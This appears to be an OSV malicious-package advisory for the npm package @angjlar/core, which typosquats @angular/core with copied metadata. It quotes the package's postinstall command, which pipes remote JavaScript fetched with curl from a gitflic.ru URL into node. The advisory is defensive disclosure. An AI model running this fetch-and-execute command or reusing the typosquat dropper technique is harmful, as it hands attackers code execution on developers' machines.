@angjlar/core@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17534
Ecosystem
npm
Summary
Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On npm install, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.
Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.